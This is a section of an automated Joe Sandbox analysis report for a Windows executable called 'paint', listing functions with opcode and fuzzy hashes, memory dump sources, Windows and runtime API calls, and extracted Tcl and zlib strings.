                                                                                                                                                                                                                                                                • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                                • Instruction ID: 188454f13ac60baba8cbd39f1db32e2de8efbcba8a8909638f95a8bb0f1d16ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A218E32A047829AEB248F64C4442FC33A4EB05718F845635DA2E86BD5EF79D588C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                • Instruction ID: 844259b4545c7f2faf098c225a1584e00bf7d74b7241a3aa4d9de9a85b274a03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD116322A1C64291EF609F5194201BEA3A4AF47B80FD540B1EB5ED7BD6EF7EE5408780
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                • Instruction ID: 12ece5c7f8db83eeb07587a4dcfa2cbaac6729c9bdb9b5f23357cf0042e842c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221F972618A4297D7619F58D44037972A4FB86B55F944234EAAFC77D9EF3ED8008B00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                • Instruction ID: ef6cb37b68703d6a30644634edae043bd8c9d68e9b5b450b3a4cf76554f29de3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8201C461A1874250EB04DF529E01069A6B5BF97FE0F884671EF7D97BDAEE3EE1814300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                • Instruction ID: 46cc1951033f4a8727cccfa4dbc0449c9df0b6d0a22c5cd1a98e075c345be1b4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF01FC20E1D6C360FF70AB65A50017862A0AF067A0FC446B5EA3FC2BC6FF3EE4518241
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                • Instruction ID: f51b5e2f2193b6b21382ae814d6f8364da8841245741e9bdab4bb463dd81fda0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59E0ECA0E18A07A6F7143AA4458617D12115F97740FC145B0EA2EA63C3FE2E68495621
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF6F0BE0D00,?,?,?,00007FF6F0BE236A,?,?,?,?,?,00007FF6F0BE3B59), ref: 00007FF6F0BED6AA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                • Instruction ID: d6683fa3ae1bdfc8c4d2a37fa4b6c07706ba87b9afd52ff45121e21a8bf76aef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1F05804F09303B8FF6467A1590167812904F96BA0F880370DD3FCB3C6FEAEA4808210
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                • Instruction ID: 4fd2aeea368b7a09fe89871dc722961a3d320f6b18d8b93d5c687a3f982faa66
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C02B728A4EB07F0EB149BA5A8149B5636AAF06756FC44035D83FC33E0FF3EB5499250
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                                • Instruction ID: e0428a7e66b7eb446a04b2a1b1b058370c5a39485da596e8ba2003185c70bbbc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAB2E776A182829BE7248FA4D4407FD77A9FB56385F805135DA2F97BC4EF39A900CB40
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                                                                • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                                • Instruction ID: 7e88066dd6b38d794819ff5c7d4bf54ccbba79fa809ddd669e283a39f9b3356a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32520672A156A69BD7948F14C458B7EBBAAFB45340F414139E66AC37C0EF3ED844CB40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                • Instruction ID: de53b9290878e02cf0887852d066492c2e9152245b0fbf26231cc6f60dc635df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B317E76609B81D6EB608FA0E8807EE7365FB85705F84403ADA5E87B94EF3DC648C710
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5CB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF561C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA979
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6F0BEA94F,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEA99E
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5CA4
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F1A
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F2B
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F3C
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                                                • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                • Instruction ID: 69cd1c9e8cec580f86320ee8c94abef9dfe5dd09a0da2057a5d6ddb0f22e9c31
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65D1D03AA0820266EB20AF61D8411B96769EF56795FC08035EE2EC77D6FF3EE4418340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                • Instruction ID: 10fd3377e37dac6840fb044f10ffcec09820b9b6a7ea783e8badb70e996898b2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4319136608B8196DB20CF64E8406AE77A8FB89754F940135EAAE83B95EF3DD545CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                • Instruction ID: 567ee392d49fde37cac01364b964fff3282d152b8466d7495051d4ecaa150321
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54B1D52AB1868291EB61DBA1D4101B96398EB46BE5FC45931EE6F87BC5FF3DE441C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6F0BF5F1A
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF567C
